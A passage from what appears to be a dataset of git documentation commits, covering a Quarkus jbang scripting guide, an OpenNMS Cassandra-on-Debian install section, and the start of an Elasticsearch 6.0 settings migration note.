Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 05:49:03,272 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 05:49:03,272 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nOnce started, you can request the provided endpoint:\n\n[source,shell]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\nhello\n----\n\nHit `CTRL+C` to stop the application, or keep it running and enjoy the blazing fast hot-reload.\n\n[TIP]\n.Automatically add newline with `curl -w \"\\n\"`\n====\nWe are using `curl -w \"\\n\"` in this example to avoid your terminal printing a '%' or putting both the result and the next command prompt on the same line.\n====\n\n[TIP]\n.Why is `quarkus-resteasy` not resolved?\n====\nIn this second run you should not see a line saying it is resolving `quarkus-resteasy` as jbang caches the dependency resolution between runs.\nIf you want to clear the caches to force resolution use `jbang cache clear`.\n====\n\n== Using injection\n\nDependency injection in Quarkus is based on ArC, which is a CDI-based dependency injection solution tailored for Quarkus' architecture.\nYou can learn more about it in the link:cdi-reference[Contexts and Dependency Injection guide].\n\nArC comes as a dependency of `quarkus-resteasy` so you already have it handy.\n\nLet's modify the application and add a companion bean.\n\nNormally you would add a separate class, but as we are aiming to have it all in one file you will add a \nnested class.\n\nAdd the following *inside* the `quarkusapp` class body.\n\n[source, java]\n----\n@ApplicationScoped\nstatic public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\n[TIP]\n.Use of nested static public classes\n====\nWe are using a nested static public class instead of a top level class for two reasons:\n\n 1. jbang currently does not support multiple source files\n 2. 
All Java frameworks relying on introspection have challenges using top level classes as they are not as visible as public classes; and in Java there can only be one top level public class in a file.\n\n====\n\nEdit the `quarkusapp` class to inject the `GreetingService` and create a new endpoint using it; you should end up with something like:\n\n[source, java]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n\/\/DEPS io.quarkus:quarkus-resteasy:999-SNAPSHOT\n\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\nimport org.jboss.resteasy.annotations.jaxrs.PathParam;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello from Quarkus with jbang.dev\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam String name) {\n return service.greeting(name);\n }\n\n @ApplicationScoped\n static public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n }\n}\n----\n\nNow when you run `jbang quarkusapp.java` you can check what the new end point returns:\n\n[source,shell,subs=attributes+]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\/greeting\/quarkus\nhello null\n----\n\nNow that is unexpected, why is it returning `hello null` and not `hello quarkus`?\n\nThe reason is that JAX-RS `@PathParam` relies on the `-parameters` compiler flag to be set to be able to map `{name}` to the `name` parameter.\n\nWe fix that by adding the following comment instruction to the file:\n\n[source,shell,subs=attributes+]\n----\n\/\/JAVAC_OPTIONS -parameters\n----\n\nNow when you run with `jbang quarkusapp.java` the end point should return what you expect:\n\n[source,shell,subs=attributes+]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\/greeting\/quarkus\nhello quarkus\n----\n\n== Debugging\n\nTo debug the application you use `jbang --debug quarkusapp.java` and you can use your IDE to connect on port 4004; if you want to use the\nmore traditional Quarkus debug port you can use `jbang --debug=5005 quarkusapp.java`.\n\nNote: `jbang` debugging always suspends, thus you need to connect the debugger to have the application run.\n\n== Logging\n\nTo use logging in Quarkus scripting with jbang you do as usual, by configuring a logger, i.e.\n\n[source,java]\n----\npublic static final Logger LOG = Logger.getLogger(quarkusapp.class);\n----\n\nTo get it to work you need to add a Java option to ensure the logging is initialized properly, i.e.\n\n[source,java]\n----\n\/\/JAVA_OPTIONS -Djava.util.logging.manager=org.jboss.logmanager.LogManager\n----\n\nWith that in place running `jbang quarkusapp.java` will log and render as expected.\n\n== Configuring Application\n\nYou can use `\/\/Q:CONFIG <property>=<value>` to set up static configuration for your application.\n\nE.g. 
if you wanted to add the `smallrye-openapi` and `swagger-ui` extensions and have the Swagger UI always show up you would add the following:\n\n[source,java,subs=attributes+]\n----\n\/\/DEPS io.quarkus:quarkus-smallrye-openapi:{quarkus-version}\n\/\/DEPS io.quarkus:quarkus-swagger-ui:{quarkus-version}\n\/\/Q:CONFIG quarkus.swagger-ui.always-include=true\n----\n\nNow during build the `quarkus.swagger-ui.always-include` will be generated into the resulting jar and `http:\/\/0.0.0.0:8080\/swagger-ui` will be available when run.\n\n== Running as a native application\n\nIf you have the `native-image` binary installed and `GRAALVM_HOME` set, you can get the native executable built and run using `jbang --native quarkusapp.java`:\n\n[source,shell,subs=attributes+]\n----\n$ jbang --native quarkusapp\n jbang --native quarkusapp.java\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 6:21:15 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.JarResultBuildStep buildNativeImageThinJar\nINFO: Building native image source jar: \/var\/folders\/yb\/sytszfld4sg8vwr1h0w20jlw0000gn\/T\/quarkus-jbang3291688251685023074\/quarkus-application-native-image-source-jar\/quarkus-application-runner.jar\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep build\nINFO: Building native image from \/var\/folders\/yb\/sytszfld4sg8vwr1h0w20jlw0000gn\/T\/quarkus-jbang3291688251685023074\/quarkus-application-native-image-source-jar\/quarkus-application-runner.jar\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep checkGraalVMVersion\nINFO: Running Quarkus native-image plugin on GraalVM Version 20.1.0 (Java Version 11.0.7)\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep build\nINFO: \/Users\/max\/.sdkman\/candidates\/java\/20.1.0.r11-grl\/bin\/native-image -J-Djava.util.logging.manager=org.jboss.logmanager.LogManager -J-Dsun.nio.ch.maxUpdateArraySize=100 -J-Dvertx.logger-delegate-factory-class-name=io.quarkus.vertx.core.runtime.VertxLogDelegateFactory -J-Dvertx.disableDnsResolver=true -J-Dio.netty.leakDetection.level=DISABLED -J-Dio.netty.allocator.maxOrder=1 -J-Duser.language=en -J-Dfile.encoding=UTF-8 --initialize-at-build-time= -H:InitialCollectionPolicy=com.oracle.svm.core.genscavenge.CollectionPolicy\\$BySpaceAndTime -H:+JNI -jar quarkus-application-runner.jar -H:FallbackThreshold=0 -H:+ReportExceptionStackTraces -H:-AddAllCharsets -H:EnableURLProtocols=http --no-server -H:-UseServiceLoaderFeature -H:+StackTrace quarkus-application-runner\n\nAug 30, 2020 6:22:31 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 76010ms\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 06:22:32,012 INFO [io.quarkus] (main) Quarkus {quarkus-version} native started in 0.017s. 
Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 06:22:32,013 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 06:22:32,013 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nThis native build will take some time on first run but any subsequent runs (without changing `quarkusapp.java`) will be close to instant:\n\n[source,shell,subs=attributes+]\n----\n$ jbang --native quarkusapp.java\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Quarkus {quarkus-version} native started in 0.015s. Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\n=== Conclusion\n\nIf you want to get started with Quarkus or write something quickly, Quarkus Scripting with jbang lets you do that. No Maven, no Gradle - just a Java file. In this guide we outlined the very basics on using Quarkus with jbang; if you want to learn more about what jbang can do go see https:\/\/jbang.dev.\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Scripting with Quarkus\n:extension-status: preview\n\nQuarkus provides integration with https:\/\/jbang.dev[jbang]] which allows you to write java scripts\/applications requiring no maven nor gradle to get running.\n\nIn this guide, we will see how you can write a REST application using just a singe java file.\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 5 minutes\n* https:\/\/jbang.dev\/download[jbang v0.40.3+]\n* an IDE\n* GraalVM installed if you want to run in native mode\n\n== Solution\n\nNormally we would link to a Git repository to clone but in this case there is no additional files than the following:\n\n[source,java,subs=attributes+]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n\/\/DEPS io.quarkus:quarkus-resteasy:999-SNAPSHOT\n\/\/JAVAC_OPTIONS -parameters\n\/\/JAVA_OPTIONS -Djava.util.logging.manager=org.jboss.logmanager.LogManager\n\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\nimport org.jboss.resteasy.annotations.jaxrs.PathParam;\nimport org.jboss.logging.Logger;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam String name) {\n return service.greeting(name);\n }\n\n @ApplicationScoped\n static public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n }\n}\n----\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint with a single source file, no additional build files like `pom.xml` or `build.gradle` needed. 
To demonstrate dependency injection, this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture]\n\n== Creating the initial file\n\nFirst, we need a java file. jbang lets you create an initial version using:\n\n[source,shell,subs=attributes+]\n----\njbang scripting\/quarkusapp.java\ncd scripting\n----\n\nThis command generates a .java file that you can directly run on Linux and OS X, i.e. `.\/quarkusapp.java` - on Windows you need to use `jbang quarkusapp.java`\n\nThis initial version will print `Hello World` when run.\n\nOnce generated, look at the `quarkusapp.java`.\n\nYou will find at the top a line looking like this:\n\n[source,java]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n----\n\nThis line is what on Linux and OS X allows you to run it as a script. On Windows this line is ignored.\n\nThe next line\n\n[source,java]\n----\n\/\/ \/\/DEPS <dependency1> <dependency2>\n----\n\nIs illustrating how you add dependencies to this script. This is a feature of `jbang`.\n\nGo ahead and update this line to include the `quarkus-resteasy` dependency like so:\n\n[source,shell,subs=attributes+]\n----\n\/\/DEPS io.quarkus:quarkus-resteasy:{quarkus-version}\n----\n\nNow, run `jbang quarkusapp.java` and you will see `jbang` resolving this dependency and building the jar with help from Quarkus jbang integration.\n\n[source,shell,subs=attributes+] \n----\n$ jbang quarkusapp.java\n\u276f jbang quarkusapp.java\n[jbang] Resolving dependencies...\n[jbang] Resolving io.quarkus:quarkus-resteasy:{quarkus-version}...Done\n[jbang] Dependencies resolved\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 5:40:55 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 5:40:56 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 722ms\nHello World\n----\n\nFor now the application does nothing new.\n\n[TIP]\n.How do I edit this file and get content assist ?\n====\nAs there is nothing but a `.java` file most IDE's does not handle content assist well.\nTo work around that you can run `jbang edit quarkusapp.java` which will print out a directory that will have a temporary project setup you can use in your IDE.\n\nOn Linux\/OSX you can run `<idecommand> `jbang edit quarkusapp.java``.\n\nIf you add dependencies while editing you can get jbang to automatically refresh\nthe IDE project using `jbang edit --live=<idecommand> quarkusapp.java`.\n====\n\n\n=== The JAX-RS resources\n\nNow let us replace the class with one that uses Quarkus features.\n\n[source,java]\n----\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n}\n----\n\nIt's a very simple class with a main method that starts Quarkus with a REST endpoint, returning \"hello\" to requests on \"\/hello\".\n\n[TIP]\n.Why is the `main` method there ?\n====\nA `main` method is currently needed for the `jbang` integration to work - will be possible to remove in the future.\n====\n\n== Running the application\n\nNow when youn run the application you will see Quarkus start up.\n\nUse: `jbang quarkusapp.java`:\n\n[source,shell,subs=attributes+]\n----\n$ jbang quarkusapp.java\n jbang quarkusapp.java\n[jbang] Building 
jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 5:49:01 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 5:49:02 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 681ms\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 05:49:03,255 INFO [io.quarkus] (main) Quarkus {quarkus-version} on JVM started in 0.638s. Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 05:49:03,272 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 05:49:03,272 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application, or keep it running and enjoy the blazing fast hot-reload.\n\n[TIP]\n.Automatically add newline with `curl -w \"\\n\"`\n====\nWe are using `curl -w \"\\n\"` in this example to avoid your terminal printing a '%' or put both result and next command prompt on the same line.\n====\n\n[TIP]\n.Why is `quarkus-resteasy` not resolved ? \n====\nIn this second run you should not see a line saying it is resolving `quarkus-resteasy` as jbang caches the dependency resolution between runs.\nIf you want to clear the caches to force resolution use `jbang cache clear`\n====\n\n== Using injection\n\nDependency injection in Quarkus is based on ArC which is a CDI-based dependency injection solution tailored for Quarkus' architecture.\nYou can learn more about it in the link:cdi-reference[Contexts and Dependency Injection guide].\n\nArC comes as a dependency of `quarkus-resteasy` so you already have it handy.\n\nLet's modify the application and add a companion bean.\n\nNormally you would add a separate class, but as we are aiming to have it all in one file you will add a \nnested class.\n\nAdd the following *inside* the `quarkusapp` class body.\n\n[source, java]\n----\n@ApplicationScoped\nstatic public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\n[TIP]\n.Use of nested static public classes\n====\nWe are using a nested static public class instead of a top level class for two reasons:\n\n 1. jbang currently does not currently support multiple source files\n 2. 
All Java frameworks relying on introspection have challenges using top level classes as they are not as visible as public classes; and in java there can only be one top level public class in a file.\n\n====\n\nEdit the `quarksapp` class to inject the `GreetingService` and create a new endpoint using it, you should end up with something like:\n\n[source, java]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n\/\/DEPS io.quarkus:quarkus-resteasy:999-SNAPSHOT\n\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\nimport org.jboss.resteasy.annotations.jaxrs.PathParam;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello from Quarkus with jbang.dev\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam String name) {\n return service.greeting(name);\n }\n\n @ApplicationScoped\n static public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n }\n}\n----\n\nNow when you run `jbang quarkusapp.java` you can check what the new end point returns:\n\n[source,shell,subs=attributes+]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\/greeting\/quarkus\nhello null\n----\n\nNow that is unexpected, why is it returning `hello null` and not `hello quarkus` ?\n\nThe reason is that JAX-RS `@PathParam` relies on the `-parameters` compiler flag to be set to be able to map `{name}` to the `name` parameter.\n\nWe fix that by adding the following comment instruction to the file:\n\n[source,shell,subs=attributes+]\n----\n\/\/JAVAC_OPTIONS -parameters\n----\n\nNow when you run with `jbang quarkusapp.java` the end point should return what you expect:\n\n[source,shell,subs=attributes+]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\/greeting\/quarkus\nhello quarkus\n----\n\n== Debugging\n\nTo debug the application you use `jbang --debug quarkusapp.java` and you can use your IDE to connect on port 4004; if you want to use the\nmore traditonal Quarkus debug port you can use `jbang --debug=5005 quarkusapp.java`.\n\nNote: `jbang` debugging always suspends thus you need to connect the debugger to have the application run.\n\n== Logging\n\nTo use logging in Quarkus scripting with jbang you do as usual, with configuring a logger, i.e.\n\n[source,java]\n----\npublic static final Logger LOG = Logger.getLogger(quarkusapp.class);\n----\n\nTo get it to work you need to add a java option to ensure the logging is initialized properly, i.e.\n\n[source,java]\n----\n\/\/JAVA_OPTIONS -Djava.util.logging.manager=org.jboss.logmanager.LogManager\n----\n\nWith that in place running `jbang quarkusapp.java` will log and render as expected.\n\n== Configuring Application\n\nYou can use `\/\/Q:CONFIG <property>=<value>` to setup static configuration for your application.\n\ni.e. 
if you wanted to add the `smallrye-openapi` and `swagger-ui` and have the swagger-ui always show up you would add the following:\n\n[source,java,subs=attributes+]\n----\n\/\/DEPS io.quarkus:quarkus-smallrye-openapi:{quarkus-version}\n\/\/DEPS io.quarkus:quarkus-swagger-ui:{quarkus-version}\n\/\/Q:CONFIG quarkus.swagger-ui.always-include=true\n----\n\nNow during build the `quarkus.swagger-ui.always-include` will be generated into the resulting jar and `http:\/\/0.0.0.0:8080\/swagger-ui` will be available when run.\n\n== Running as a native application\n\nIf you have `native-image` binary installed and GRAALVM_HOME set you can get native binary built and run using `jbang --native quarkusapp.java`:\n\n[source,shell,subs=attributes+]\n----\n$ jbang --native quarkusapp\n jbang --native quarkusapp.java\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 6:21:15 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.JarResultBuildStep buildNativeImageThinJar\nINFO: Building native image source jar: \/var\/folders\/yb\/sytszfld4sg8vwr1h0w20jlw0000gn\/T\/quarkus-jbang3291688251685023074\/quarkus-application-native-image-source-jar\/quarkus-application-runner.jar\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep build\nINFO: Building native image from \/var\/folders\/yb\/sytszfld4sg8vwr1h0w20jlw0000gn\/T\/quarkus-jbang3291688251685023074\/quarkus-application-native-image-source-jar\/quarkus-application-runner.jar\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep checkGraalVMVersion\nINFO: Running Quarkus native-image plugin on GraalVM Version 20.1.0 (Java Version 11.0.7)\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep build\nINFO: \/Users\/max\/.sdkman\/candidates\/java\/20.1.0.r11-grl\/bin\/native-image -J-Djava.util.logging.manager=org.jboss.logmanager.LogManager -J-Dsun.nio.ch.maxUpdateArraySize=100 -J-Dvertx.logger-delegate-factory-class-name=io.quarkus.vertx.core.runtime.VertxLogDelegateFactory -J-Dvertx.disableDnsResolver=true -J-Dio.netty.leakDetection.level=DISABLED -J-Dio.netty.allocator.maxOrder=1 -J-Duser.language=en -J-Dfile.encoding=UTF-8 --initialize-at-build-time= -H:InitialCollectionPolicy=com.oracle.svm.core.genscavenge.CollectionPolicy\\$BySpaceAndTime -H:+JNI -jar quarkus-application-runner.jar -H:FallbackThreshold=0 -H:+ReportExceptionStackTraces -H:-AddAllCharsets -H:EnableURLProtocols=http --no-server -H:-UseServiceLoaderFeature -H:+StackTrace quarkus-application-runner\n\nAug 30, 2020 6:22:31 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 76010ms\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 06:22:32,012 INFO [io.quarkus] (main) Quarkus {quarkus-version} native started in 0.017s. 
Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 06:22:32,013 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 06:22:32,013 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nThis native build will take some time on first run but any subsequent runs (without changing `quarkusapp.java`) will be close to instant:\n\n[source,shell,subs=attributes+]\n----\n$ jbang --native quarkusapp.java\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Quarkus {quarkus-version} native started in 0.015s. Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\n=== Conclusion\n\nIf you want to get started with Quarkus or write something quickly, Quarkus Scripting with jbang lets you do that. No Maven, no Gradle - just a java file. In this guide we outlined the very basics on using Quarkus with jbang; if you want to learn more about what jbang can do go see https:\/\/jbang.dev.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bb0bb24f668be6213f2a21f981360f7c232ffc9","subject":"HZN-352: Reviewer fixes","message":"HZN-352: Reviewer fixes","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/newts\/cassandra-debian.adoc","new_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/newts\/cassandra-debian.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-install-cassandra-debian]]\n==== Installing on Debian-based systems\n\nThis section describes how to install the latest _Cassandra 2.1.x_ release on a _Debian_-based system for _Newts_.\nThe first step is to add the _DataStax_ community repository and install the required _GPG Key_ to verify the integrity of the _DEB packages_.\nInstallation of the package is done with _apt_ and the _Cassandra_ service is added to the runlevel configuration.\n\nNOTE: This description was built on _Debian 8_ and _Ubuntu 14.04 LTS_.\n\n.Add the DataStax repository\n[source, bash]\n----\nvi \/etc\/apt\/sources.list.d\/cassandra.sources.list\n----\n\n.Content of the cassandra.sources.list file\n[source, bash]\n----\ndeb http:\/\/debian.datastax.com\/community stable main\n----\n\n.Install GPG key to verify DEB packages\n[source, bash]\n----\nwget -O - http:\/\/debian.datastax.com\/debian\/repo_key | apt-key add -\n----\n\n.Install latest Cassandra 2.1.x package\n[source, bash]\n----\napt-get update\napt-get install dsc21=2.1.8-1 cassandra=2.1.8\n----\n\nThe _Cassandra_ service is added to the runlevel configuration and is automatically started after installing the package.\n\nTIP: Verify whether the _Cassandra_ service is automatically started after rebooting the server.\n","old_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-install-cassandra-debian]]\n==== Installing on Debian-based systems\n\nThis section describes how to install the latest _Cassandra 2.1.x_ release on a _Debian_ based systems for _Newts_.\nThe first steps add the _DataStax_ community repository and install the required _GPG Key_ to verify the integrity of the _DEB 
packages_.\nInstallation of the package is done with _apt_ and the _Cassandra_ service is added to the run level configuration.\n\nNOTE: This description is build on _Debian 8_ and _Ubuntu 14.04 LTS_.\n\n.Add DataStax repository\n[source, bash]\n----\nvi \/etc\/apt\/sources.list.d\/cassandra.sources.list\n----\n\n.Content of the cassandra.sources.list file\n[source, bash]\n----\ndeb http:\/\/debian.datastax.com\/community stable main\n----\n\n.Install GPG key to verify DEB packages\n[source, bash]\n----\nwget -O - http:\/\/debian.datastax.com\/debian\/repo_key | apt-key add -\n----\n\n.Install latest Cassandra 2.1.x package\n[source, bash]\n----\napt-get update\napt-get install dsc21=2.1.8-1 cassandra=2.1.8\n----\n\nThe _Cassandra_ service is added to the run level configuration and is automatically started after installing the package.\n\nTIP: Verify if the _Cassandra_ service is automatically started after rebooting the server.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3967261a9350d4fa0d488640b829f73c9a11f4a9","subject":"Add migration note for remote cluster settings (#33632)","message":"Add migration note for remote cluster settings (#33632)\n\nThe remote cluster settings search.remote.* have been renamed to\ncluster.remote.* and are automatically upgraded in the cluster state on\ngateway recovery, and on put. This commit adds a note to the migration\ndocs for these changes.\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/migration\/migrate_6_0\/settings.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0\/settings.asciidoc","new_contents":"[[breaking_60_settings_changes]]\n=== Settings changes\n\n==== Remove support for elasticsearch.json and elasticsearch.yaml configuration file\n\nThe configuration file found in the Elasticsearch config directory could previously have\na `.yml`, `.yaml` or `.json` extension. Only `elasticsearch.yml` is now supported.\n\n==== Duplicate keys in configuration file\n\nIn previous versions of Elasticsearch, the configuration file was allowed to\ncontain duplicate keys. For example:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n\nnode\n attr:\n rack: my-rack\n--------------------------------------------------\n\nIn Elasticsearch 6.0.0, this is no longer permitted. Instead, this must be\nspecified in a single key as:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n attr:\n rack: my-rack\n--------------------------------------------------\n\n==== Coercion of boolean settings\n\nPreviously, Elasticsearch recognized the strings `true`, `false`, `on`, `off`, `yes`, `no`, `0`, `1` as booleans. Elasticsearch 6.0\nrecognizes only `true` and `false` as boolean and will throw an error otherwise. For backwards compatibility purposes, during the 6.x series\nindex settings on pre-6.0 indices will continue to work. Note that this does not apply to node-level settings that are stored\nin `elasticsearch.yml`.\n\n==== Snapshot settings\n\nThe internal setting `cluster.routing.allocation.snapshot.relocation_enabled` that allowed shards with running snapshots to be reallocated to\ndifferent nodes has been removed. 
Enabling this setting could cause allocation issues if a shard got allocated off a node and then\nreallocated back to this node while a snapshot was running.\n\n==== Store throttling settings\n\nStore throttling has been removed. As a consequence, the\n`indices.store.throttle.type` and `indices.store.throttle.max_bytes_per_sec`\ncluster settings and the `index.store.throttle.type` and\n`index.store.throttle.max_bytes_per_sec` index settings are not\nrecognized anymore.\n\n==== Store settings\n\nThe `default` `index.store.type` has been removed. If you were using it, we\nadvise that you simply remove it from your index settings and Elasticsearch\nwill use the best `store` implementation for your operating system.\n\n==== Network settings\n\nThe blocking TCP client, blocking TCP server, and blocking HTTP server have been removed.\nAs a consequence, the `network.tcp.blocking_server`, `network.tcp.blocking_client`,\n`network.tcp.blocking`,`transport.tcp.blocking_client`, `transport.tcp.blocking_server`,\nand `http.tcp.blocking_server` settings are not recognized anymore.\n\nThe previously unused settings `transport.netty.max_cumulation_buffer_capacity`,\n`transport.netty.max_composite_buffer_components` and\n`http.netty.max_cumulation_buffer_capacity` have been removed.\n\n==== Similarity settings\n\nThe `base` similarity is now ignored as coords and query normalization have\nbeen removed. If 